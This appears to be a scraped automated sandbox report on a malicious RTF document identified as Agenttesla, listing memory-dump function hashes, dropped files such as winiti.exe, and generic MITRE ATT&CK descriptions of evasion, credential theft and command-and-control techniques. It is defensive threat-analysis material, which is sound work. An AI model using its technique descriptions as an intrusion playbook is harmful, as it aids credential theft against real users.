$p, xrefs: 00724EC6
$p, xrefs: 00724E90
$p, xrefs: 00724E84
$p, xrefs: 00724DFE
$p, xrefs: 00724E65
$p, xrefs: 00724E59
$p, xrefs: 00724EBA

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-4214562277
Opcode ID: 4d5f49a1dda19ca77cb3ea99d9411e19ac513ac595e774c338827ead8f864c8a
Instruction ID: 1d80b3bba3828686c0979a71a49112796f0b2ae425b8fbc85d426548bd14cf52
Opcode Fuzzy Hash: 4d5f49a1dda19ca77cb3ea99d9411e19ac513ac595e774c338827ead8f864c8a
Instruction Fuzzy Hash: FE915F30A00315DFEB24EF64F989BAEBBB2BF84300F648429E41197294DB799D45CB90

Function 007250A0 Relevance: 10.2, Strings: 8, Instructions: 178COMMON

Download Yara Rule

Strings

$p, xrefs: 00725250
$p, xrefs: 00725244
$p, xrefs: 007251C1
$p, xrefs: 007251CD
$p, xrefs: 00725215
$p, xrefs: 0072526D
$p, xrefs: 00725279
$p, xrefs: 00725221

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-4214562277
Opcode ID: ab879f3e901971d61d3166597f4f76e30c50ee881d7370276d3730f370f376fd
Instruction ID: b0119fc8d1c227d889625162c5eb00cfa70e269de27f54d98973470aa4785572
Opcode Fuzzy Hash: ab879f3e901971d61d3166597f4f76e30c50ee881d7370276d3730f370f376fd
Instruction Fuzzy Hash: B4518F30A11614DFCB29DB68F8846AEB7E2FF84310F64842AD815D7395DB39DC46CB91

Function 00722790 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$p, xrefs: 007229F7
$p, xrefs: 007229EB
$p, xrefs: 00722A50
$p, xrefs: 00722A5C

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: 34158f7fb972481f1db424a29b5d3b8129df7813de55e9566425e89d20d0a528
Instruction ID: ff41b3be644cb3da2aa0cacbc4ca895611ceddc3538968682e850decd71ef465
Opcode Fuzzy Hash: 34158f7fb972481f1db424a29b5d3b8129df7813de55e9566425e89d20d0a528
Instruction Fuzzy Hash: 0FB14E70A00215DFDB28EF68E5857AEBBB2EF84301F64C429D4059B356DB79DD86CB80

Function 00722BA8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRp, xrefs: 00722C9B
LRp, xrefs: 00722CEA
$p, xrefs: 00722C27
$p, xrefs: 00722C33

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: LRp$LRp$$p$$p
API String ID: 0-727438728
Opcode ID: f33578c3a05471f87b4097519590c8702986a0cc7ac2c8c7e5ffa57fe85e71ae
Instruction ID: 4ad4ee7fc9c9c280a87412d4f7a2b8ce78e90279af42083dc7ba41363e2d5351
Opcode Fuzzy Hash: f33578c3a05471f87b4097519590c8702986a0cc7ac2c8c7e5ffa57fe85e71ae
Instruction Fuzzy Hash: 14518370700311AFCB18EF64E495A6E77E2FF89300F548969E4059B36ADB35ED46CB50

Function 00725094 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$p, xrefs: 00725244
$p, xrefs: 007251C1
$p, xrefs: 00725215
$p, xrefs: 0072526D

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: e51e58dbf884b8e9afdd6a919e9a281616ad64df01d563c07cf81cba37dc7654
Instruction ID: f80594c5d6327bf1679c15f1db586568a21d7e7c47be8f1fd2caa03241afa40f
Opcode Fuzzy Hash: e51e58dbf884b8e9afdd6a919e9a281616ad64df01d563c07cf81cba37dc7654
Instruction Fuzzy Hash: 44517D30A11618DBCB25DB68F5846AEB7F2FF84310F64892AE805D7395DB39DC42CB90

Function 0072511D Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

$p, xrefs: 00725244
$p, xrefs: 007251C1
$p, xrefs: 00725215
$p, xrefs: 0072526D

Memory Dump Source

Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_720000_winiti.jbxd

Similarity

API ID:
String ID: $p$$p$$p$$p
API String ID: 0-3121760203
Opcode ID: f7da82ad57e671e339d5d17bb68d4a8b63b50cc6b9721221ef28bcc544c011c6
Instruction ID: d199ed712113167a27ce69d0031b63fc4d3e3a7b5481320b498fc2cd704344ec
Opcode Fuzzy Hash: f7da82ad57e671e339d5d17bb68d4a8b63b50cc6b9721221ef28bcc544c011c6
Instruction Fuzzy Hash: 3B418C70A10614CBCF25EB68F58566D73E2FF88300B64842AE8169B399DB38DC46CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2FBexXRCHR.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{87E6EBAC-0849-42D8-978B-492A9A003210}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A35E5ED9-2E36-4F95-9E06-B99263E8CEA4}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B73513B2-3E0D-42E7-B536-2812A501893B}.tmp

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\2FBexXRCHR.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\winiti.exe

C:\Users\user\Desktop\~$BexXRCHR.rtf

Static File Info

Windows Analysis Report
2FBexXRCHR.rtf

Function 00190508 Relevance: 43.2, Strings: 33, Instructions: 1944
COMMON

Function 0019117E Relevance: 43.2, Strings: 33, Instructions: 1929
COMMON

Function 0019EE05 Relevance: 1.8, APIs: 1, Instructions: 326
processCOMMON

Function 0019EE10 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Function 0019EA70 Relevance: 1.6, APIs: 1, Instructions: 122
injectionCOMMON

Function 0019EA78 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 0019EBD1 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Function 0019EBD8 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 0019E948 Relevance: 1.6, APIs: 1, Instructions: 106
memoryCOMMON

Function 0019E950 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 0019E818 Relevance: 1.6, APIs: 1, Instructions: 100
threadCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre